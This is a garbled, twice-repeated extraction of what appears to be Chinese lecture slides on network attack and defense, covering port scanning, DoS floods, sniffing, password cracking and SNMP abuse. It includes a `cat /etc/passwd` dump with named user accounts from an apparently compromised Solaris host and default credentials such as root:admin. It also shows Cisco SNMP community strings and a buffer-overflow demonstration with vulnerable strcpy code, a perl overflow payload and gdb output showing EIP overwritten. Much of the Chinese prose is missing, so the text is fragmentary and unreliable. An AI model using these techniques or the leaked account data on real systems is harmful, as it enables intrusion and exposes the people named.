网络攻击与防御技术
合集下载
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
SYN
SYN ACK /SYN
tcp connect
tcp connect tcp connect tcp connect tcp connect tcp connect
tcp connect
ISP
OSSun Solaris Firewall
uid=2(bin) gid=2(bin) / SunOS 5.7 Generic sun4u sparc SUNW,Ultra-
ILMI
vcn_xx
XX
80root:admin telnet test:test su root:admin xx
RPC-DCOM
2
cd
radius telnet
2
uid=2(bin) gid=2(bin) / SunOS rad 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250Cat /etc/passwd hostname rad root:x:0:1:Super-User:/:/usr/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/:/bin/sh adm:x:4:4:Admin:/var/adm:/bin/sh lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/sh smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: ppeng:x:1004:10:Free user:/home1/usr/pengpeng:/bin/passwd zhzhu:x:1007:10:director manager:/home1/usr/zhzhu:/bin/passwd mjiang:x:1008:10:Admin user:/home1/usr/mjiang:/bin/passwd crsc_tc:x:1052:10:normal user:/home1/usr/crsc_tc:/bin/passwd import1:x:1054:10:normal user:/home1/usr/import1:/bin/passwd zodzl:x:1055:10:normal user:/home1/usr/zodzl:/bin/passwd jdp:x:1056:10:normal user:/home1/usr/jdp:/bin/passwd Li_Yuren:x:1057:10:normal user:/home1/usr/Li_Yuren:/bin/passwd twxst:x:1059:10:normal user:/home1/usr/twxst:/bin/passwd
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax
0xbffffc60 -1073742752
ecx
0x564eff41 1448017729
edx
0x57500042 1464860738
2
wwwx.x.x.197 x.x.x.195 ACEswitch 180e
SNMP private
IP Address
x.x.4.5
System Name
xx7513
Contact
Location
Cisco Internetwork Operating System Software
IOS (tm) RSP Software (RSP-ISV-M), Version 12.0(5)T1, RELEASE SOFTWARE (fc1)
WIN
MD5
MD5
MD5(admin,32) = 21232f297a57a5a743894a0e4a801fc3 MD5(admin,16) = 7a57a5a743894a0e
WebProxy SPIKE Proxy SQL
SQL SQLSQL Injection
SQL
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 19-Aug-99 01:39 by cmong
Read-Only Community Strings ILMI public vcn_xx xxxGSR vcn_xxx
Read-Write Community Strings
NBSI Domain3.6
Phishing
eBay
"" ""
MP3
(IEFirefox) IM(MSNQQ) Office(Word)
Email
1
2Email telnetEmail Email
DoSDDoS
DoS (Denial of Service)
WEB FTP Mail
SNMP
Nessus Unix GTKJavaWin
Nessus
Client
Server
Targets
X-Scan
X-Scan
ISS Internet Security Scanner SSSShadow Security Scanner Retina Network Security ScannereEye LANguard Network Security Scanner CyberCop ScannerNAI
SSSShadow Security Scanner
Retina Network Security Scanner
LANguard Network Security Scanner
Telnet 80WEB
banner
TCP/IP
TCP/IP
TTL Windows ToS DF ISN MSS
DDoS (Distributed Denial of Service)
nuke)
SYN Flood ICMP Flood UDP Flood Ping of Death
CGI winnuke
SYN Flood
SYN
ACK /SYN
ACK
SYN Flood
HUB
Switch
ARP
sniffer
passwd
$%@&)*=-~`^,{
(Promiscuous) MAC
POP3 Ftp Telnet
ifconfigUNIX
DNS
AntiSnifffor winfor unix Promiscan
Ethereal() Windump(http://windump.polito.it/) Xsniff()
4 $ /sbin/ifconfig -a /sbin/ifconfig -a lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu
8232 inet 127.0.0.1 netmask ff000000
hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTI CAST> mtu 1500 inet xx.151.243.78 netmask ffffffc0 broadcast xx.151.243.127
--
Windows
2006(ms06040) 2006
(1)
IP OS (2)Whois Ping Traceroute Nslookup
1. 2.
3.sniffer? 4.DOS? 6.TCP/IP
?
Nessus() X-Scan()
Google Hacking
inurl: intext: Intitle: filetype:
: B/SC/S
Internet Explore
r
> 1024
IE
...
Windows
IP
WIN()
TCP SYN
TCP
SYN
SYN+ACK
SYN
RST
SYN
Nmap "" for Unixfor Win LibpcapWinpcap -sS -sT:connect() -sUudp -O -P0ping -p -v
NmapWin v1.3.0
SuperScan Windows 4.0
ebx
0x40162154 1075192148
esp
0xbffffc80 0xbffffc80
ebp
0x41414141 0x41414141
esi
0x400168e4 1073834212
edi
0xbffffd04 -1073742588
eip
0x42424242 0x42424242
....
}
[wlj@debian wlj]$ gcc -o vul vul.c [wlj@debian wlj]$ gdb ./vul -q (gdb) r `perl -e 'print "A"x28'`BBBB Starting program: /home/wlj/./vul `perl -e 'print "A"x28'`BBBB
Metasploit (/)
-
void function(char *str) { char buffer[16];
strcpy(buffer,str); }
void main(int argc, char **argv) {
if(argc > 1 ) function(argv[1]);
cat /etc/passwd root:x:0:1:Super-User:/:/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp:
Web
/neolabs/neo-ports/neo-ports.html
TCP/IP IP
ICMP (TOS) TCP/IP SYN FLOOD TCP
Nmap() Superscan() Sl()
Hydra(/) Brutus X-Scan()
,ftp pop3
FTP
John(/john/) L0pht Crack5()
SYN ACK /SYN
tcp connect
tcp connect tcp connect tcp connect tcp connect tcp connect
tcp connect
ISP
OSSun Solaris Firewall
uid=2(bin) gid=2(bin) / SunOS 5.7 Generic sun4u sparc SUNW,Ultra-
ILMI
vcn_xx
XX
80root:admin telnet test:test su root:admin xx
RPC-DCOM
2
cd
radius telnet
2
uid=2(bin) gid=2(bin) / SunOS rad 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250Cat /etc/passwd hostname rad root:x:0:1:Super-User:/:/usr/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/:/bin/sh adm:x:4:4:Admin:/var/adm:/bin/sh lp:x:71:8:Line Printer Admin:/usr/spool/lp:/bin/sh smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: ppeng:x:1004:10:Free user:/home1/usr/pengpeng:/bin/passwd zhzhu:x:1007:10:director manager:/home1/usr/zhzhu:/bin/passwd mjiang:x:1008:10:Admin user:/home1/usr/mjiang:/bin/passwd crsc_tc:x:1052:10:normal user:/home1/usr/crsc_tc:/bin/passwd import1:x:1054:10:normal user:/home1/usr/import1:/bin/passwd zodzl:x:1055:10:normal user:/home1/usr/zodzl:/bin/passwd jdp:x:1056:10:normal user:/home1/usr/jdp:/bin/passwd Li_Yuren:x:1057:10:normal user:/home1/usr/Li_Yuren:/bin/passwd twxst:x:1059:10:normal user:/home1/usr/twxst:/bin/passwd
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax
0xbffffc60 -1073742752
ecx
0x564eff41 1448017729
edx
0x57500042 1464860738
2
wwwx.x.x.197 x.x.x.195 ACEswitch 180e
SNMP private
IP Address
x.x.4.5
System Name
xx7513
Contact
Location
Cisco Internetwork Operating System Software
IOS (tm) RSP Software (RSP-ISV-M), Version 12.0(5)T1, RELEASE SOFTWARE (fc1)
WIN
MD5
MD5
MD5(admin,32) = 21232f297a57a5a743894a0e4a801fc3 MD5(admin,16) = 7a57a5a743894a0e
WebProxy SPIKE Proxy SQL
SQL SQLSQL Injection
SQL
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Thu 19-Aug-99 01:39 by cmong
Read-Only Community Strings ILMI public vcn_xx xxxGSR vcn_xxx
Read-Write Community Strings
NBSI Domain3.6
Phishing
eBay
"" ""
MP3
(IEFirefox) IM(MSNQQ) Office(Word)
1
2Email telnetEmail Email
DoSDDoS
DoS (Denial of Service)
WEB FTP Mail
SNMP
Nessus Unix GTKJavaWin
Nessus
Client
Server
Targets
X-Scan
X-Scan
ISS Internet Security Scanner SSSShadow Security Scanner Retina Network Security ScannereEye LANguard Network Security Scanner CyberCop ScannerNAI
SSSShadow Security Scanner
Retina Network Security Scanner
LANguard Network Security Scanner
Telnet 80WEB
banner
TCP/IP
TCP/IP
TTL Windows ToS DF ISN MSS
DDoS (Distributed Denial of Service)
nuke)
SYN Flood ICMP Flood UDP Flood Ping of Death
CGI winnuke
SYN Flood
SYN
ACK /SYN
ACK
SYN Flood
HUB
Switch
ARP
sniffer
passwd
$%@&)*=-~`^,{
(Promiscuous) MAC
POP3 Ftp Telnet
ifconfigUNIX
DNS
AntiSnifffor winfor unix Promiscan
Ethereal() Windump(http://windump.polito.it/) Xsniff()
4 $ /sbin/ifconfig -a /sbin/ifconfig -a lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu
8232 inet 127.0.0.1 netmask ff000000
hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTI CAST> mtu 1500 inet xx.151.243.78 netmask ffffffc0 broadcast xx.151.243.127
--
Windows
2006(ms06040) 2006
(1)
IP OS (2)Whois Ping Traceroute Nslookup
1. 2.
3.sniffer? 4.DOS? 6.TCP/IP
?
Nessus() X-Scan()
Google Hacking
inurl: intext: Intitle: filetype:
: B/SC/S
Internet Explore
r
> 1024
IE
...
Windows
IP
WIN()
TCP SYN
TCP
SYN
SYN+ACK
SYN
RST
SYN
Nmap "" for Unixfor Win LibpcapWinpcap -sS -sT:connect() -sUudp -O -P0ping -p -v
NmapWin v1.3.0
SuperScan Windows 4.0
ebx
0x40162154 1075192148
esp
0xbffffc80 0xbffffc80
ebp
0x41414141 0x41414141
esi
0x400168e4 1073834212
edi
0xbffffd04 -1073742588
eip
0x42424242 0x42424242
....
}
[wlj@debian wlj]$ gcc -o vul vul.c [wlj@debian wlj]$ gdb ./vul -q (gdb) r `perl -e 'print "A"x28'`BBBB Starting program: /home/wlj/./vul `perl -e 'print "A"x28'`BBBB
Metasploit (/)
-
void function(char *str) { char buffer[16];
strcpy(buffer,str); }
void main(int argc, char **argv) {
if(argc > 1 ) function(argv[1]);
cat /etc/passwd root:x:0:1:Super-User:/:/bin/csh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp:
Web
/neolabs/neo-ports/neo-ports.html
TCP/IP IP
ICMP (TOS) TCP/IP SYN FLOOD TCP
Nmap() Superscan() Sl()
Hydra(/) Brutus X-Scan()
,ftp pop3
FTP
John(/john/) L0pht Crack5()